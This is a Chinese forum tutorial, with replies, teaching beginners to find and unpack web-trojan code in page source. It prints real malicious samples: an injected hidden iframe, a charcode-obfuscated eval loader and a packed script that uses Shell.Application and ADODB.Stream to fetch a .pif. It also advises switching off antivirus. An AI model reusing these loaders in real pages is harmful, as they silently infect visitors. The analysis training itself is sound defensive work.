蓝核教你 简单解网马 1 &广告贴（本帖会被小a误报，但确保无毒）

蓝核

希望这是我第一个能用原创标签的帖子……！哦也！
如果版主不合适%就%PM我换成分享吧……

4楼有好东西哦

本教程仅针对，啥都不懂得人，也算是hunter最最简单的入门教程，也算是我在hunter里面学习之后，对自己过去几个月的一个思路整理和总结。由于本帖的针对对象是对新人区，所以我根本不会扯任何关于网页过于生涩的东西。（神吐槽：老子……才不会告诉你们……我啥都不会了……）至于更深一点的教程，欢迎申请hunter，加入之后有哦~~我已经在写2了~不过这个就不大会放在公共可见的地方。

分为2个部分

废话
方法
最后还有一个
广告


废话

简单的说，啥叫解网马了，就是坏人把一匹匹可爱的小马通过一定的技巧把他们的下载地址给隐藏起来，而我们就是要找出来地址。

在这里，先推荐大家看看屁颠放在应用区的教程 http://bbs.kafan.cn/thread-1300032-1-1.html

这个时候就会有小朋友说，这个文章我看不懂呀。我也不是学这个的呀，我XXX……

其实我也看不懂，但是你去看网马区，我照样不是解开了么……

这个时候，某些hunter立刻给我一刀，XX，你用工具当然好解了！

无法直视，你说，这种揭人短处的坏人，是不是直接拖出去比较好。

先简单的说一下，我们需要啥。

一个能接入网络的电脑，一个浏览器，一个沙盘。本机环境最好不要有java。因为通过java漏洞的网马比较蛋疼。

哦，记得，关闭你的杀软。

小朋友就会问，为啥要关闭杀软了？

因为现在大部分杀软，哪怕不具备流量扫描功能，但是到了本地依旧会杀。而一般来说，杀毒软件就会限制对某某网页的访问，这个时候，我们就看不到代码或者看到的只有空空如也得屏幕了。那你还解啥

那网马不是有危害么，好可怕啊！！！这个时候就需要沙盘了啊，当然很多成熟的人自己用chrome啥的，也是可以的，但是我还是建议，最好用沙盘。专业的，我比较相信。

常见的浏览器，chrome，Firefox和opera都可以。

下面我们要干嘛呢？？

废话，去网马区啊！直接有人提供练习题啊。

在去之前，我们来讲解一下我解网马的心得，很简单，就几个字：找不同，找特殊。

注意，网马还有一个特殊性，就是有时效性。网马很苦的，你不知道这2年各家主流浏览器商的黑白名单建的多快，经常我好不容易打开了挂马网页，谷歌的恶意库已经提醒了，IE的smartscreen就不说了……所以常常会失效。你说，这些坑爹的，对网马一点都不心疼。他们不知道网马的发布者为了攻击网站放小马花了多少的精力啊！这个时候，我们要注意的就是，如果我们只是抱着上网的心态的，这个网站就不要进去了。如果是解马，就点击我要进去。

这个常常会造成啥问题……我找不到一个好的案例……

蓝核

方法
找不同
下面干的时候特简单，右键，查看页面源代码。

这个时候我要出来说一句，虽然各家都有很牛逼的网页代码查看工具，比如op的蜻蜓啥的，我暂时用不习惯，所以还是习惯直接看页面源代码。但是其他的hunter用的很舒服，大家各取所需。

我们以简单的百度为例……注意，该网页的代码已经被我合法的处理了……所以别问我……这个网页存不存在。

1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
2. <html xmlns="http://www.w3.org/1999/xhtml"><html><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <title>百度一下，你就知道</title> <style >html,body{height:100%}html{overflow-y:auto}#wrapper{position:relative;_position:;min-height:100%}#content{padding-bottom:100px;text-align:center}#ftCon{height:100px;position:absolute;bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overflow:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-style:none}body,form,#fm{position:relative}td{text-align:left}img{border:0}a{color:#00c}a:active{color:#f60}#u{color:#999;padding:4px 10px 5px 0;text-align:right}#u a{margin:0 5px}#u .reg{margin:0}#m{width:720px;margin:0 auto}#nv a,#nv b,.btn,#lk{font-size:14px}#fm{padding-left:110px;text-align:left;z-index:1}input{border:0;padding:0}#nv{height:19px;font-size:16px;margin:0 0 4px;text-align:left;text-indent:137px}.s_ipt_wr{width:418px;height:30px;display:inline-block;margin-right:5px;background:url(http://s1.bdstatic.com/r/www/img/i-1.0.0.png) no-repeat -304px 0;border:1px solid #b6b6b6;border-color:#9a9a9a #cdcdcd #cdcdcd #9a9a9a;vertical-align:top}.s_ipt{width:405px;height:22px;font:16px/22px arial;margin:5px 0 0 7px;background:#fff;outline:0;-webkit-appearance:none}.s_btn{width:95px;height:32px;padding-top:2px\9;font-size:14px;background:#ddd url(http://s1.bdstatic.com/r/www/img/i-1.0.0.png);cursor:pointer}.s_btn_h{background-position:-100px 0}.s_btn_wr{width:97px;height:34px;display:inline-block;background:url(http://s1.bdstatic.com/r/www/img/i-1.0.0.png) no-repeat -202px 0;*position:relative;z-index:0;vertical-align:top}#lg img{vertical-align:top;margin-bottom:3px}#lk{margin:33px 0}#lk span{font:14px "宋体"}#lm{height:60px}#lh{margin:16px 0 5px;word-spacing:3px}.tools{position:absolute;top:-4px;*top:10px;right:7px}#mHolder{width:62px;position:relative;z-index:296;display:none}#mCon{height:18px;line-height:18px;position:absolute;cursor:pointer;padding:0 18px 0 0;background:url(http://s1.bdstatic.com/r/www/img/bg-1.0.0.gif) no-repeat right -134px;background-position:right -136px\9}#mCon span{color:#00c;cursor:default;display:block}#mCon .hw{text-decoration:underline;cursor:pointer}#mMenu a{width:100%;height:100%;display:block;line-height:22px;text-indent:6px;text-decoration:none;filter:none\9}#mMenu,#user ul{box-shadow:1px 1px 2px #ccc;-moz-box-shadow:1px 1px 2px #ccc;-webkit-box-shadow:1px 1px 2px #ccc;filter:progid:DXImageTransform.Microsoft.Shadow(Strength=2,Direction=135,Color="#cccccc")\9}#mMenu{width:56px;border:1px solid #9b9b9b;list-style:none;position:absolute;right:27px;top:28px;display:none;background:#fff}#mMenu a:hover{background:#ebebeb}#mMenu .ln{height:1px;background:#ebebeb;overflow:hidden;font-size:1px;line-height:1px;margin-top:-1px}#cp,#cp a{color:#666}#seth{display:none;behavior:url(#default#homepage)}#setf{display:none}#sekj{margin-left:14px}#shouji{margin-right:14px}</style> <script>function h(obj){obj.style.behavior='url(#default#homepage)';var a = obj.setHomePage('http://www.baidu.com/');}</script></head><body> <div id="wrapper"><div id="content"> <div id="u"><a href="http://www.baidu.com/gaoji/preferences.html" name="tj_setting">搜索设置</a>|<a href="https://passport.baidu.com/v2/?login&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F" name="tj_login" id="lb" onclick="return false;">登录</a><a href="https://passport.baidu.com/v2/?reg&regType=1&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F" target="_blank" name="tj_reg" class="reg">注册</a></div> <div id="m"> <p id="lg"><img src="http://www.baidu.com/img/shouye_b5486898c692066bd2cbaeda86d74448.gif" width="270" height="129" ></p> <p id="nv"><a href="http://news.baidu.com">新&nbsp;闻</a>　<b>网&nbsp;页</b>　<a href="http://tieba.baidu.com">贴&nbsp;吧</a>　<a href="http://zhidao.baidu.com">知&nbsp;道</a>　<a href="http://music.baidu.com">音&nbsp;乐</a>　<a href="http://image.baidu.com">图&nbsp;片</a>　<a href="http://video.baidu.com">视&nbsp;频</a>　<a href="http://map.baidu.com">地&nbsp;图</a></p><div id="fm"><form name="f" action="/s"><span class="s_ipt_wr"><input type="text" name="wd" id="kw" maxlength="100" class="s_ipt"></span><input type="hidden" name="rsv_bp" value="0"><input type=hidden name=ch value=""><input type=hidden name=tn value="cnopera_4_dg"><input type=hidden name=bar value=""><input type="hidden" name="rsv_spt" value="3"><input type="hidden" name="ie" value="utf-8"><span class="s_btn_wr"><input type="submit" value="百度一下" id="su" class="s_btn" onmousedown="this.className='s_btn s_btn_h'" onmouseout="this.className='s_btn'"></span></form><span class="tools"><span id="mHolder"><div id="mCon"><span>输入法</span></div></span></span><ul id="mMenu"><li><a href="#" name="ime_hw">手写</a></li><li><a href="#" name="ime_py">拼音</a></li><li class="ln"></li><li><a href="#" name="ime_cl">关闭</a></li></ul></div> <p id="lk"><a href="http://baike.baidu.com">百科</a>　<a href="http://wenku.baidu.com">文库</a>　<a href="http://www.hao123.com">hao123</a><span> | <a href="http://www.baidu.com/more/">更多&gt;&gt;</a></span></p><p id="lm"><a href="http://tieba.baidu.com/f?kw=%B5%D8%D5%F0" title="" target="_blank" style="font-family: 宋体,Arial,Helvetica,sans-serif;">支持雅安，寻找每一个生命奇迹</a></p> </div> </div> <div id="ftCon"><div id="ftConw"> <p ><a id="seth" onClick="h(this)" href="/" onmousedown="return ns_c({'fm':'behs','tab':'homepage','pos':0})">把百度设为主页</a><a id="setf" href="http://www.baidu.com/cache/sethelp/index.html" onmousedown="return ns_c({'fm':'behs','tab':'favorites','pos':0})" target="_blank">把百度设为主页</a><span id="sekj"><a href="http://liulanqi.baidu.com/ps.php" target="_blank" onmousedown="return ns_c({'fm':'behs','tab':'bdbrwlk','pos':1})">安装百度浏览器</a></span></p><p id="lh"><a href="http://e.baidu.com/?refer=888" onmousedown="return ns_c({'fm':'behs','tab':'btlink','pos':2})">加入百度推广</a> | <a href="http://top.baidu.com">搜索风云榜</a> | <a href="http://home.baidu.com">关于百度</a> | <a href="http://ir.baidu.com">About Baidu</a></p><p id="cp">&copy;2013 Baidu <a href="/duty/">使用百度前必读</a> <a href="http://www.miibeian.gov.cn" target="_blank">京ICP证030173号</a> <img src="http://www.baidu.com/cache/global/img/gs.gif"></p></div></div> </div> </body><script>var bds={se:{},comm : {ishome : 1,sid : "1439",user : "",username : "",sugHost : "http://suggestion.baidu.com/su",personalData : "",loginAction : []}}</script><script type="text/javascript" src="http://s1.bdstatic.com/r/www/cache/global/js/home-2.10.js" charset="gbk"></script><script>var bdUser = null;var w=window,d=document,n=navigator,k=d.f.wd,a=d.getElementById("nv").getElementsByTagName("a"),isIE=n.userAgent.indexOf("MSIE")!=-1&&!window.opera;(function(){if(/q=([^&]+)/.test(location.search)){k.value=decodeURIComponent(RegExp["\x241"])}})();if(n.cookieEnabled){bds.se.sug();};function addEV(o, e, f){if(w.attachEvent){o.attachEvent("on" + e, f);}else if(w.addEventListener){ o.addEventListener(e, f, false);}}function G(id){return d.getElementById(id);}function ns_c(q){var p = encodeURIComponent(window.document.location.href), sQ = '', sV = '', mu='', img = window["BD_PS_C" + (new Date()).getTime()] = new Image();for (v in q) {sV = q[v];sQ += v + "=" + sV + "&";} mu= "&mu=" + p ;img.src = "http://nsclick.baidu.com/v.gif?pid=201&pj=www&rsv_sid=1439&" + sQ + "path="+p+"&t="+new Date().getTime();return true;}if(/\bbdime=[12]/.test(d.cookie)){document.write('<script src=http://s1.bdstatic.com/r/www/cache/ime/js/openime-1.0.1.js charset="gbk"><\/script>');}(function(){var u = G("u").getElementsByTagName("a"), nv = G("nv").getElementsByTagName("a"), lk = G("lk").getElementsByTagName("a"), un = "";var tj_nv = ["news","tieba","zhidao","mp3","img","video","map"];var tj_lk = ["baike","wenku","hao123","more"];un = bds.comm.user == "" ? "" : bds.comm.user;function _addTJ(obj){addEV(obj, "mousedown", function(e){var e = e || window.event;var target = e.target || e.srcElement;ns_c({'fm':'behs','tab':target.name||'tj_user','un':encodeURIComponent(un)});});}for(var i = 0; i < u.length; i++){_addTJ(u[i]);}for(var i = 0; i < nv.length; i++){nv[i].name = 'tj_' + tj_nv[i];}for(var i = 0; i < lk.length; i++){lk[i].name = 'tj_' + tj_lk[i];}})();(function() {var links = {'tj_news': ['word', 'http://news.baidu.com/ns?tn=news&cl=2&rn=20&ct=1&ie=utf-8'],'tj_tieba': ['kw', 'http://tieba.baidu.com/f?ie=utf-8'],'tj_zhidao': ['word', 'http://zhidao.baidu.com/search?pn=0&rn=10&lm=0'],'tj_mp3': ['key', 'http://music.baidu.com/search?fr=ps&ie=utf-8'],'tj_img': ['word', 'http://image.baidu.com/i?ct=201326592&cl=2&nc=1&lm=-1&st=-1&tn=baiduimage&istype=2&fm=&pv=&z=0&ie=utf-8'],'tj_video': ['word', 'http://video.baidu.com/v?ct=301989888&s=25&ie=utf-8'],'tj_map': ['wd', 'http://map.baidu.com/?newmap=1&ie=utf-8&s=s'],'tj_baike': ['word', 'http://baike.baidu.com/search/word?pic=1&sug=1&enc=utf8'],'tj_wenku': ['word', 'http://wenku.baidu.com/search?ie=utf-8']};var domArr = [G('nv'), G('lk')],kw = G('kw');for (var i = 0, l = domArr.length; i < l; i++) {domArr[i].onmousedown = function(e) {e = e || window.event;var target = e.target || e.srcElement,name = target.getAttribute('name'),items = links[name],reg = new RegExp('^\\s+|\\s+\x24'),key = kw.value.replace(reg, '');if (items) {if (key.length > 0) {var wd = items[0], url = items[1],url = url + ( name === 'tj_map' ? encodeURIComponent('&' + wd + '=' + key) : ( ( url.indexOf('?') > 0 ? '&' : '?' ) + wd + '=' + encodeURIComponent(key) ) );target.href = url;} else {target.href = target.href.match(new RegExp('^http:\/\/.+\.baidu\.com'))[0];}}name && ns_c({'fm': 'behs','tab': name,'query': encodeURIComponent(key),'un': encodeURIComponent(bds.comm.user || '') });};}})();addEV(w,"load",function(){k.focus()});w.onunload=function(){};</script><script type="text/javascript" src="http://s1.bdstatic.com/r/www/cache/global/js/tangram-1.3.4c1.0.js"></script><script type="text/javascript" src="http://s1.bdstatic.com/r/www/cache/user/js/u-1.3.7.js" charset="gbk"></script><script>try{document.cookie="WWW_ST=;expires=Sat, 01 Jan 2000 00:00:00 GMT";baidu.on(document.forms[0],"submit",function(){var _t=new Date().getTime();document.cookie = "WWW_ST=" + _t +";expires=" + new Date(_t + 10000).toGMTString()})}catch(e){}</script></html><script>(function(){var C=G("lm").getElementsByTagName("A");for(var B=0,A=C.length;B<A;B++){var D=C[B];addEV(D,"mousedown",(function(E,F){return function(){ns_c({fm:"behs",tab:"bdlnk",p1:F+1,title:E.innerHTML,url:E.href})}})(D,B))}})();</script><!--fcf1925a9059adfe--><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=hxxp://xxxx.om/zqpu.html?i=1962901></iframe>

复制代码

好复杂，好头昏……这是啥……

来放轻松。

先想一想，这个网站是百度，那么基本上baidu.com前后加点啥的都是干净的（注意，这里只是为了便于理解，还要分类讨论，但是没有一个好例子，一个挂马网站不会一直活着的）。比如说啥呢，类似于这个 http://liulanqi.baidu.com/ps.php或者是http：//tongji.baidu.com/tongji.js

好，我们来看看，这个网站上，有啥看起来不应该是百度的。

这个时候会有小朋友指出头部

1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
2. <html xmlns="http://www.w3.org/1999/xhtml"

复制代码

你看w3的链接，好奇怪啊哦

这个其实是一个声明，就是告诉浏览器的消息，跟我们无关，所以这个可以放过，小朋友不错~~~记住哦，这个基本上可以放入你的白名单了。

这个也是百度家的 bdstatic.com，所以可以跳过了。

我们继续看哈.

哎，百度怎么会有一个推特的链接？

1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=hxxp://xxxx.om/zqpu.html?i=1962901></iframe>（该地址已经被处理过了，理论上不存在这个网站……）

复制代码

好奇怪哦，点进去看看…但是后面给的地址跟推特不一样啊，额好奇怪哦。
这个时候我们可以干啥呢，用趋势。趋势是谁，趋势可是做云信誉比较早和牛逼的，来吧，记住这个网址

http://global.sitesafety.trendmicro.com/index.php

趋势科技网页信誉中心。

为啥推荐趋势了？

第一，趋势做这个专业

第二，趋势会告诉你这个网站有没有恶意行为，是什么样的恶意行，是欺骗，还是恶意下载。如果是干净的，趋势会告诉你这个网站是干嘛，卖小广告的，域名托管的？尤其是在鉴定国外的网址上，特别需要趋势给他一个定论。

第三 趋势会告诉你，抱歉，我们没有测试过。ok，在这个案例中你就可以有80%的把握，断定，这个就是挂马的地址了。这个理由很牵强，但是这个已经算习惯的感觉了。

在这里，我们总结一下这个最简单的方法，开沙盘，进毒网，找不同，找特殊。当然，为了确保正确性，用趋势咖啡的毒网库验证下还是可以的。

关于找特殊，这个可以等你看多了正常网站之后……看代码突然发现有一大串奇葩的数字或者乱码的时候

比如

1. <SCRIPT>ss=String["fromCharCode"];try{document.body|=1}catch(dgsgsdg){zz=26;whwej=12;ww=window;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","4c","4a","4d","4b","4c","3l","47","46","46","3n","3l","4c","4b","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","4c","4a","4d","4b","4c","3l","47","46","46","3n","3l","4c","4b","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=0;i-634!=0;i++){k=i;s+=ss(parseInt(n[i],zz));}z=s;ww["eval"](""+s);}}}}</SCRIPT>

复制代码

这种反复出现的，就是很奇葩的有99%可能的挂马了……说实话，这种东西……怎么解？我真不知道……想要知道如何解，请……来申请吧！话说我很想知道那个未转正的人怎么解的……

关于这个方法，还有一个要提示的就是，记住常见的白名单……比如qq……比如百度……114,51la等等……

蓝核

alert 跑起来
本案例直接拿屁颠的帖子里的案例……

争取比屁颠看起来有亲和力……

1. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f["g"]["s"]("q");1 8="p:";1 9="0-k-0";1 7="l";1 5="G";1 2="N";1 c="Z-W-Y";1 K="U.X"+"M"+"L"+"H"+"T"+"T"+"P";1 V="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";1 3="O.";1 6="Q";1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))

复制代码

简单点说，就是加标签让他动起来。
将此段代码复制粘贴至记事本中，将其中的eval修改为alert其余内容不变，但要加上<script></script>实际变为一个脚本。保存为htm(文件名任意)处理后的代码如下：

1. <script>
   
2. alert(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f["g"]["s"]("q");1 8="p:";1 9="0-k-0";1 7="l";1 5="G";1 2="N";1 c="Z-W-Y";1 K="U.X"+"M"+"L"+"H"+"T"+"T"+"P";1 V="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";1 3="O.";1 6="Q";1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))</script>

复制代码

注意一头一尾。总共加了3个东西。

双击，然后你就会发现，有了！



这个也算解马，不用管那么多纷乱的世界，直接触碰核心。

记住，这个时候也不要开杀软，不用担心安全性。注意，搞完之后把那个html给删除了哦。

别问我原理，记住就行了。

当然，这个办法不是万能的……有的时候……跑不出来。

借助杀软
经常去毒网的人都知道，经常是开了杀毒软件，然后开始弹窗
XXX.js被干掉了 jQuery.js 什么等等

特别是已经看了1的小朋友会告诉我说 jQuery.js不是应该也算是……有名的东西么，是呀。但是你要知道，常常就是这种东西才会被拿来干坏事呀。

这个时候我们解马其实蛮简单的……很简单，放出那个隔离文件，打开看代码
十有八九有

src=xxxx

有的杀软会弹窗警告你 XXX网页据我们侦查是坏网页，不要去。你会讶异，咦，为啥我的浏览器是BBB地址了？

这个说明，坏人已经通过技术手段，把BBB网站被迫穿上了XXX的衣服，而这个衣服上有毒。

这个也算解了一半了。

总结一下，看代码的时候先看头部和尾部，常常懒人都会把小马直接放这个地方。借助杀软和alert就是套，反正前面已经有方向了。

蓝核

嗯

广告时间
光说不练假把式啊，各位亲爱的饭友门，不去毒网区试试么，带上你的小沙盘，去找不同吧~~

只要能解出正确的，会有加分哦。至少10分起步，要是手动接触了混淆系，不客气，贴出方法经验不低哦。

要是解不出但是贴出了恶意的乱码，我们肯定也会意思意思的。

要是真正好的，我们会考虑拉你入伙哦~~~~

但是你不去网马区玩……那就……

ljp2993

纯支持了···现在又裸奔了···网马区不敢去···

蓝核

ljp2993 发表于 2013-4-20 23:00
纯支持了···现在又裸奔了···网马区不敢去···

那就淡定的不要去样本大区就行了~~

ljp2993

蓝核 发表于 2013-4-20 23:08
那就淡定的不要去样本大区就行了~~

这个很难控制···

HearFish

写完了？我在想应该给多少稿费

蓝核

HearFish 发表于 2013-4-20 23:10
写完了？我在想应该给多少稿费

这篇是写完了~

234447327

一天一夜没睡觉的我看到这一大堆代码脑袋立刻凌乱了。